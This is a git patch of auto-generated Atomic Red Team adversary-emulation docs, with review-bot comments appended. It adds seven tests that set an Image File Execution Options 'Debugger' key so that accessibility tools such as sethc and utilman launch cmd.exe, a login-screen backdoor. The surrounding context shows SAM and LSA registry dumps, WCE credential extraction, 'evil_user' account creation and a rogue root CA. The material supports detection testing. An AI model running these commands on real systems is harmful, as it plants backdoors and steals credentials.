From 4bb3db16076854f6cd223a818d15d0c226099654 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 31 May 2018 14:09:33 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=T1015-adds --- atomics/T1002/T1002.md | 6 ++ atomics/T1003/T1003.md | 9 ++- atomics/T1007/T1007.md | 2 +- atomics/T1015/T1015.md | 126 ++++++++++++++++++++++++++++++++++++++- atomics/T1028/T1028.md | 2 +- atomics/T1033/T1033.md | 2 +- atomics/T1048/T1048.md | 2 +- atomics/T1053/T1053.md | 4 +- atomics/T1087/T1087.md | 5 ++ atomics/T1130/T1130.md | 6 ++ atomics/T1136/T1136.md | 6 ++ atomics/index.md | 16 ++++- atomics/windows-index.md | 16 ++++- 13 files changed, 187 insertions(+), 15 deletions(-) diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md index 7dd3c69c70..e9619594e8 100644 --- a/atomics/T1002/T1002.md +++ b/atomics/T1002/T1002.md @@ -48,6 +48,12 @@ TODO **Supported Platforms:** Windows +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| input_file | Path that should be compressed into our output file | Path | *.docx| +| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar| + #### Run it with `powershell`! ``` rar a -r #{output_file} #{input_file} diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 89257bca16..f75b91da1f 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -187,6 +187,11 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/ **Supported Platforms:** Windows +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where resulting data should be placed | Path | output.txt| + #### Run it with `command_prompt`! ``` wce -o #{output_file} @@ -195,7 +200,7 @@ wce -o #{output_file}
## Atomic Test #4 - Registry dump of SAM, creds, and secrets -Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated +Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 **Supported Platforms:** Windows @@ -203,7 +208,7 @@ via three registry keys. Then processed locally using https://github.com/Neohaps #### Run it with `command_prompt`! ``` -reg save HKLM\sam sam +reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security ``` diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index 7b9f05e11a..edfdfb3666 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -28,7 +28,7 @@ Identify system services #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| servicename | Name of service to start stop, query | string | svchost.exe| +| service_name | Name of service to start stop, query | string | svchost.exe| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md index f2e51cc561..7afccc501d 100644 --- a/atomics/T1015/T1015.md +++ b/atomics/T1015/T1015.md @@ -32,12 +32,132 @@ Contributors: Paul Speulstra, AECOM Global Security Operations Center + +## Atomic Test #1 - Attaches Command Prompt As Debugger To Process - osk +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | osk.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #2 - Attaches Command Prompt As Debugger To Process - sethc +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | sethc.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #3 - Attaches Command Prompt As Debugger To Process - utilman +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | utilman.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #4 - Attaches Command Prompt As Debugger To Process - magnify +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | magnify.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #5 - Attaches Command Prompt As Debugger To Process - narrator +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | narrator.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +
+
+ +## Atomic Test #6 - Attaches Command Prompt As Debugger To Process - DisplaySwitch +This allows adversaries to execute the attached process + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe| + +#### Run it with `command_prompt`! +``` +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +``` +

-## Atomic Test #1 - Attaches Command Prompt As Debugger To Process +## Atomic Test #7 - Attaches Command Prompt As Debugger To Process - AtBroker This allows adversaries to execute the attached process **Supported Platforms:** Windows @@ -46,7 +166,7 @@ This allows adversaries to execute the attached process #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| target_executable | File You Want To Attach To | String | osk.exe| +| target_executable | File You Want To Attach cmd To | String | atbroker.exe| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index 51cb9e74ab..93be88be2a 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md @@ -53,7 +53,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| computername | Name of Computer | string | computer1| +| computer_name | Name of Computer | string | computer1| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 8e54198ec2..e958a32057 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -40,7 +40,7 @@ Identify System owner or users on an endpoint #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| computername | Name of remote computer | strong | computer1| +| computer_name | Name of remote computer | strong | computer1| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index a786bd3102..9f79b02e2c 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md 
@@ -34,7 +34,7 @@ Remote to Local |------|-------------|------|---------------| | domain | target SSH domain | url | target.example.com| | user_name | username for domain | string | atomic| -| passowrd | password for user | string | atomic| +| password | password for user | string | atomic| #### Run it with `sh`! ``` diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md index f075a9b736..f008f18398 100644 --- a/atomics/T1053/T1053.md +++ b/atomics/T1053/T1053.md @@ -83,8 +83,8 @@ Create a task on a remote system | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| | target | Target | String | localhost| -| UserName | Username DOMAIN\User | String | DOMAIN\user| -| Password | Password | String | At0micStrong| +| user_name | Username DOMAIN\User | String | DOMAIN\user| +| password | Password | String | At0micStrong| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md index bafe8e68fa..123a2c15a1 100644 --- a/atomics/T1087/T1087.md +++ b/atomics/T1087/T1087.md @@ -118,6 +118,11 @@ xxx **Supported Platforms:** Linux, macOS +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | ~/loot.txt| + #### Run it with `sh`! ``` lastlog > #{output_file} diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md index 8b991777cd..821e57764e 100644 --- a/atomics/T1130/T1130.md +++ b/atomics/T1130/T1130.md @@ -45,6 +45,12 @@ Creates a root CA with openssl **Supported Platforms:** Linux +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| +| cert_filename | Path of the CA certificate we create | Path | rootCA.crt| + #### Run it with `sh`! ``` openssl genrsa -out #{key_filename} 4096 
diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md index 34004b92b6..3008de58e5 100644 --- a/atomics/T1136/T1136.md +++ b/atomics/T1136/T1136.md @@ -46,6 +46,12 @@ Creates a user on a MacOS system with dscl **Supported Platforms:** macOS +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Username of the user to create | String | evil_user| +| realname | 'realname' to record when creating the user | String | Evil Account| + #### Run it with `bash`! ``` dscl . -create /Users/#{username} diff --git a/atomics/index.md b/atomics/index.md index 0bf6845bd3..ecb4219558 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -3,7 +3,13 @@ - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - Atomic Test #1: .bash_profile and .bashrc [macos, linux] - [T1015 Accessibility Features](./T1015/T1015.md) - - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] + - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] + - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] + - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows] + - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows] + - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows] + - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows] + - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1103 AppInit DLLs](./T1103/T1103.md) - Atomic Test #1: Install AppInit Shim [windows] 
@@ -240,7 +246,13 @@ - [T1134 Access Token Manipulation](./T1134/T1134.md) - Atomic Test #1: Access Token Manipulation [windows] - [T1015 Accessibility Features](./T1015/T1015.md) - - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] + - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] + - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] + - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows] + - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows] + - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows] + - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows] + - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1103 AppInit DLLs](./T1103/T1103.md) - Atomic Test #1: Install AppInit Shim [windows] diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 64a58d7b09..5e72a8a1bc 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
@@ -84,7 +84,13 @@ - [T1134 Access Token Manipulation](./T1134/T1134.md) - Atomic Test #1: Access Token Manipulation [windows] - [T1015 Accessibility Features](./T1015/T1015.md) - - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] + - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] + - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] + - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows] + - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows] + - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows] + - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows] + - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1103 AppInit DLLs](./T1103/T1103.md) - Atomic Test #1: Install AppInit Shim [windows] 
@@ -119,7 +125,13 @@ # persistence - [T1015 Accessibility Features](./T1015/T1015.md) - - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows] + - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] + - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] + - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows] + - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows] + - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows] + - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows] + - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows] - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) - [T1103 AppInit DLLs](./T1103/T1103.md) - Atomic Test #1: Install AppInit Shim [windows]
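Review bot: in the T1002 hunk the new `input_file` row declares Type `Path` but its default `*.docx` is a glob pattern, not a path; either note in the Description that wildcards are accepted by `rar a -r` or change the Type so the table is accurate for anyone scripting against these inputs.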
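Review bot: the input renames in the T1007, T1028, T1048 and T1053 hunks (`servicename` to `service_name`, `computername` to `computer_name`, `passowrd` to `password`, `UserName`/`Password` to `user_name`/`password`) are not accompanied by a visible change to the command block that consumes them; each hunk ends at the opening ``` of the `#### Run it with` section. Since this commit is generator output (Subject: "Generate docs from job=validate_atomics_generate_docs"), please confirm in the atomic YAML source that the command templates now use `#{service_name}`, `#{computer_name}`, `#{password}` and `#{user_name}`, otherwise the old placeholders will be left unsubstituted at run time.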
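Review bot: in the T1033 hunk the renamed row `| computer_name | Name of remote computer | strong | computer1|` still carries the Type typo `strong`; it should be `string` to match the other tables, and since the row is already being touched this is the place to fix it.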
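Review bot: the seven new T1015 tests differ only in the `target_executable` default, yet all reuse the one-line description "This allows adversaries to execute the attached process", which names neither the accessibility binary being hijacked nor what the test leaves behind, and no cleanup step is shown for the `Image File Execution Options` key each test writes. Suggest each description name its binary (as the headings now do) and that the hardcoded `C:\windows\system32\cmd.exe` debugger path become an input, so a detection engineer validating alerts on IFEO `Debugger` writes can substitute a benign executable. Minor: the heading for Test #7 says `AtBroker` while the default is `atbroker.exe`, whereas `DisplaySwitch.exe` keeps its casing; pick one convention.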
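Review bot: the T1087 hunk header shows the test description as `xxx` (`@@ -118,6 +118,11 @@ xxx`), a placeholder left in the source. Since this hunk adds the Inputs table for that same test, replace the placeholder with a real description of what `lastlog > #{output_file}` records.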
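Review bot: this patch moves input names to snake_case (`service_name`, `computer_name`, `user_name`), but the new T1136 Inputs table introduces `username` and `realname`. For consistency, name them `user_name` and `real_name` and update the `dscl . -create /Users/#{username}` template in the source to match; the same convention check applies to `key_filename`/`cert_filename` in T1130, which already conform.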